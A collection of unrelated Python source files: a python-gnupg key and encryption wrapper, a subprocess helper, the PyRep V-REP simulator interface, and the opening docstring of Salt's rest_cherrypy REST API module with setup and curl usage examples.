"""Generate a key; you might use gen_key_input() to create the
control input.
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
if str(val).strip(): # skip empty strings
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',2048)
parms.setdefault('Name-Real', "Autogenerated Key")
logname = (os.environ.get('LOGNAME') or os.environ.get('USERNAME') or
'unspecified')
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False, extra_args=None):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
if symmetric:
# can't be False or None - could be True or a cipher algo value
# such as AES256
args = ['--symmetric']
if symmetric is not True:
args.extend(['--cipher-algo', no_quote(symmetric)])
# else use the default, currently CAST5
else:
if not recipients:
raise ValueError('No recipients specified with asymmetric '
'encryption')
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.extend(['--recipient', no_quote(recipient)])
if armor: # create ascii-armored output - False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if sign is True: # pragma: no cover
args.append('--sign')
elif sign: # pragma: no cover
args.extend(['--sign', '--default-key', no_quote(sign)])
if always_trust: # pragma: no cover
args.append('--always-trust')
if extra_args:
args.extend(extra_args)
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys", ignore_errors=True)
>>> GPGBINARY = os.environ.get('GPGBINARY', 'gpg')
>>> gpg = GPG(gpgbinary=GPGBINARY, gnupghome="keys")
>>> input = gpg.gen_key_input(name_email='user1@test', passphrase='pp1')
>>> result = gpg.gen_key(input)
>>> fp1 = result.fingerprint
>>> input = gpg.gen_key_input(name_email='user2@test', passphrase='pp2')
>>> result = gpg.gen_key(input)
>>> fp2 = result.fingerprint
>>> result = gpg.encrypt("hello",fp2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message, passphrase='pp2')
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again", fp1)
>>> message = str(result)
>>> result = gpg.decrypt(message, passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message, passphrase='pp1')
>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello", fp2, sign=fp1, passphrase='pp1')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message, passphrase='pp2')
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == fp1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None, extra_args=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if always_trust: # pragma: no cover
args.append("--always-trust")
if extra_args:
args.extend(extra_args)
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
def trust_keys(self, fingerprints, trustlevel):
levels = Verify.TRUST_LEVELS
if trustlevel not in levels:
poss = ', '.join(sorted(levels))
raise ValueError('Invalid trust level: "%s" (must be one of %s)' %
(trustlevel, poss))
trustlevel = levels[trustlevel] + 2
import tempfile
try:
fd, fn = tempfile.mkstemp()
lines = []
if isinstance(fingerprints, string_types):
fingerprints = [fingerprints]
for f in fingerprints:
lines.append('%s:%s:' % (f, trustlevel))
# The trailing newline is required!
s = os.linesep.join(lines) + os.linesep
logger.debug('writing ownertrust info: %s', s);
os.write(fd, s.encode(self.encoding))
os.close(fd)
result = self.result_map['delete'](self)
p = self._open_subprocess(['--import-ownertrust', fn])
self._collect_output(p, result, stdin=p.stdin)
finally:
os.remove(fn)
return result
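# Minimal usage sketch (illustrative; home directory and passphrase are placeholders):
#   gpg = GPG(gnupghome='/tmp/gnupg-home')
#   key_input = gpg.gen_key_input(passphrase='secret')
#   key = gpg.gen_key(key_input)
#   signed = gpg.sign('hello', keyid=key.fingerprint, passphrase='secret')
#   assert gpg.verify(signed.data)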
|
cmd.py
|
import subprocess
from utlz import func_has_arg, namedtuple
CmdResult = namedtuple(
typename='CmdResult',
field_names=[
'exitcode',
'stdout', # type: bytes
'stderr', # type: bytes
'cmd',
'input',
],
lazy_vals={
'stdout_str': lambda self: self.stdout.decode('utf-8'),
'stderr_str': lambda self: self.stderr.decode('utf-8'),
}
)
def run_cmd(cmd, input=None, timeout=30, max_try=3, num_try=1):
'''Run command `cmd`.
It's like that, and that's the way it is.
'''
if type(cmd) == str:
cmd = cmd.split()
process = subprocess.Popen(cmd,
stdin=open('/dev/null', 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
communicate_has_timeout = func_has_arg(func=process.communicate,
arg='timeout')
exception = Exception
if communicate_has_timeout:
exception = subprocess.TimeoutExpired # python 3.x
stdout = stderr = b''
exitcode = None
try:
if communicate_has_timeout:
# python 3.x
stdout, stderr = process.communicate(input, timeout)
exitcode = process.wait()
else:
# python 2.x
if timeout is None:
stdout, stderr = process.communicate(input)
exitcode = process.wait()
else:
# thread-recipe: https://stackoverflow.com/a/4825933
def target():
# closure-recipe: https://stackoverflow.com/a/23558809
target.out, target.err = process.communicate(input)
import threading
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
process.terminate()
thread.join()
exitcode = None
else:
exitcode = process.wait()
stdout = target.out
stderr = target.err
except exception:
if num_try < max_try:
return run_cmd(cmd, input, timeout, max_try, num_try+1)
else:
return CmdResult(exitcode, stdout, stderr, cmd, input)
return CmdResult(exitcode, stdout, stderr, cmd, input)
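# Example usage (illustrative):
#   result = run_cmd('echo hello')
#   if result.exitcode == 0:
#       print(result.stdout_str)  # -> 'hello\n'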
|
pyrep.py
|
from pyrep.backend import vrep, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
class PyRep(object):
"""Used for interfacing with the V-REP simulation.
Can be used for starting, stopping, and stepping the simulation. As well
as getting, and creating scene objects and robots.
"""
def __init__(self):
self.running = False
self._process = None
self._robot_to_count = {}
self.connected = False
self._ui_thread = None
self._responsive_ui_thread = None
self._step_lock = Lock()
self._init_thread_id = None
self._shutting_down = False
self._handles_to_objects = {}
if 'VREP_ROOT' not in os.environ:
raise PyRepError(
'VREP_ROOT not defined. See installation instructions.')
self._vrep_root = os.environ['VREP_ROOT']
if not os.path.exists(self._vrep_root):
raise PyRepError(
'VREP_ROOT was not a correct path. '
'See installation instructions')
def _run_ui_thread(self, scene_file: str, headless: bool) -> None:
# Need this otherwise extensions will not be loaded
os.chdir(self._vrep_root)
options = vrep.sim_gui_headless if headless else vrep.sim_gui_all
vrep.simExtLaunchUIThread(options=options, scene=scene_file,
pyrep_root=self._vrep_root)
def _run_responsive_ui_thread(self) -> None:
while True:
if not self.running:
with self._step_lock:
if self._shutting_down or vrep.simExtGetExitRequest():
break
vrep.simExtStep(False)
time.sleep(0.01)
# If the exit request was from the UI, then call shutdown, otherwise
# shutdown caused this thread to terminate.
if not self._shutting_down:
self.shutdown()
def launch(self, scene_file="", headless=False, responsive_ui=False,
blocking=False) -> None:
"""Launches V-REP.
Launches the UI thread and waits until the UI thread has finished; this
results in the current thread becoming the simulation thread.
:param scene_file: The scene file to load. Empty string for empty scene.
:param headless: Run V-REP in headless mode (without the GUI).
:param responsive_ui: If True, then a separate thread will be created to
asynchronously step the UI of V-REP. Note that this will reduce
the responsiveness of the simulation thread.
:param blocking: Causes V-REP to launch as if running the default c++
client application. This causes the function to block. For most
users, this will be set to False.
"""
if len(scene_file) > 0 and not os.path.isfile(
os.path.abspath(scene_file)):
raise PyRepError('Scene file does not exist: %s' % scene_file)
self._ui_thread = threading.Thread(target=self._run_ui_thread,
args=(scene_file, headless))
self._ui_thread.daemon = True
self._ui_thread.start()
while not vrep.simExtCanInitSimThread():
time.sleep(0.1)
vrep.simExtSimThreadInit()
time.sleep(0.2) # Stops V-REP crashing if it is restarted too quickly.
if blocking:
while not vrep.simExtGetExitRequest():
vrep.simExtStep()
self.shutdown()
elif responsive_ui:
self._responsive_ui_thread = threading.Thread(
target=self._run_responsive_ui_thread)
self._responsive_ui_thread.daemon = True
try:
self._responsive_ui_thread.start()
except (KeyboardInterrupt, SystemExit):
if not self._shutting_down:
self.shutdown()
sys.exit()
self.step()
else:
self.step()
def script_call(self, function_name_at_script_name: str,
script_handle_or_type: int,
ints=(), floats=(), strings=(), bytes='') -> (
Tuple[List[int], List[float], List[str], str]):
"""Calls a script function (from a plugin, the main client application,
or from another script). This represents a callback inside of a script.
:param function_name_at_script_name: A string representing the function
name and script name, e.g. myFunctionName@theScriptName. When the
script is not associated with an object, then just specify the
function name.
:param script_handle_or_type: The handle of the script, otherwise the
type of the script.
:param ints: The input ints to the script.
:param floats: The input floats to the script.
:param strings: The input strings to the script.
:param bytes: The input bytes to the script (as a string).
:return: Any number of return values from the called Lua function.
"""
return utils.script_call(
function_name_at_script_name, script_handle_or_type, ints, floats,
strings, bytes)
def shutdown(self) -> None:
"""Shuts down the V-REP simulation.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self._ui_thread is not None:
self._shutting_down = True
self.stop()
self.step_ui()
vrep.simExtPostExitRequest()
vrep.simExtSimThreadDestroy()
self._ui_thread.join()
if self._responsive_ui_thread is not None:
self._responsive_ui_thread.join()
# V-REP crashes if new instance opened too quickly after shutdown.
# TODO: A small sleep stops this for now.
time.sleep(0.1)
self._ui_thread = None
self._shutting_down = False
def start(self) -> None:
"""Starts the physics simulation if it is not already running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if not self.running:
vrep.simStartSimulation()
self.running = True
def stop(self) -> None:
"""Stops the physics simulation if it is running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self.running:
vrep.simStopSimulation()
self.running = False
            # Need this so the UI updates
            for _ in range(5):
                self.step()
def step(self) -> None:
"""Execute the next simulation step.
If the physics simulation is not running, then this will only update
the UI.
"""
with self._step_lock:
vrep.simExtStep()
def step_ui(self) -> None:
"""Update the UI.
This will not execute the next simulation step, even if the physics
simulation is running.
This is only applicable when PyRep was launched without a responsive UI.
"""
with self._step_lock:
vrep.simExtStep(False)
def set_simulation_timestep(self, dt: float) -> None:
"""Sets the simulation time step.
:param dt: The time step value.
"""
vrep.simSetFloatParameter(vrep.sim_floatparam_simulation_time_step, dt)
def set_configuration_tree(self, config_tree: bytes) -> None:
"""Restores configuration information previously retrieved.
Configuration information (object relative positions/orientations,
joint/path values) can be retrieved with
:py:meth:`Object.get_configuration_tree`. Dynamically simulated
objects will implicitly be reset before the command is applied
(i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
before).
:param config_tree: The configuration tree to restore.
"""
vrep.simSetConfigurationTree(config_tree)
def group_objects(self, objects: List[Shape]) -> Shape:
"""Groups several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single grouped shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles)
return Shape(handle)
def merge_objects(self, objects: List[Shape]) -> Shape:
"""Merges several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single merged shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles, merge=True)
return Shape(handle)
def import_model(self, filename: str) -> Object:
""" Loads a previously saved model.
:param filename: model filename. The filename extension is required
("ttm"). An optional "@copy" can be appended to the filename, in
which case the model's objects will be named/renamed as if an
associated script was attached to the model.
:return: The imported model.
"""
handle = vrep.simLoadModel(filename)
return utils.to_type(handle)
def create_texture(self, filename: str, interpolate=True, decal_mode=False,
repeat_along_u=False, repeat_along_v=False
) -> Tuple[Shape, Texture]:
"""Creates a planar shape that is textured.
:param filename: Path to the texture to load.
        :param interpolate: If False, adjacent texture pixels are not interpolated.
:param decal_mode: Texture is applied as a decal (its appearance
won't be influenced by light conditions).
:param repeat_along_u: Texture will be repeated along the U direction.
:param repeat_along_v: Texture will be repeated along the V direction.
:return: A tuple containing the textured plane and the texture.
"""
        # Options form a bit field; each flag occupies its own bit.
        options = 0
        if not interpolate:
            options |= 1
        if decal_mode:
            options |= 2
        if repeat_along_u:
            options |= 4
        if repeat_along_v:
            options |= 8
handle = vrep.simCreateTexture(filename, options)
s = Shape(handle)
return s, s.get_texture()
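# A minimal usage sketch (illustrative only, not part of the library): it
# assumes V-REP is installed and the VREP_ROOT environment variable is set.
if __name__ == '__main__':
    pr = PyRep()
    pr.launch('', headless=True)  # an empty scene-file string loads an empty scene
    pr.start()
    for _ in range(100):  # advance the physics simulation by 100 steps
        pr.step()
    pr.stop()
    pr.shutdown()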
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
  wheel modules on the Master. Wheel modules do not have a direct CLI
  equivalent but they typically manage Master-side resources such as state
  files, pillar files, and the Salt config files; for example, the
  :py:mod:`key wheel module <salt.wheel.key>` exposes functionality similar
  to the ``salt-key`` CLI command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
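A minimal sketch of that asynchronous pattern, reusing the authenticated cookie
file from the earlier examples (the job id below is illustrative):
.. code-block:: bash
    # Kick off the job without waiting for the minion returns; note the jid.
    curl -b ~/cookies.txt -sS localhost:8000 \\
        -H 'Content-type: application/json' \\
        -d '[{"client": "local_async", "tgt": "*", "fun": "test.ping"}]'
    # Later, fetch the cached return for that job from the job cache.
    curl -b ~/cookies.txt -sS localhost:8000/jobs/20130603122505459265 \\
        -H 'Accept: application/x-yaml'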
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
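As a rough illustration, both knobs sit alongside the other ``rest_cherrypy``
options in the master config; the values below are starting points to test
against, not recommendations:
.. code-block:: yaml
    rest_cherrypy:
        port: 8000
        thread_pool: 200
        socket_queue_size: 50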
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
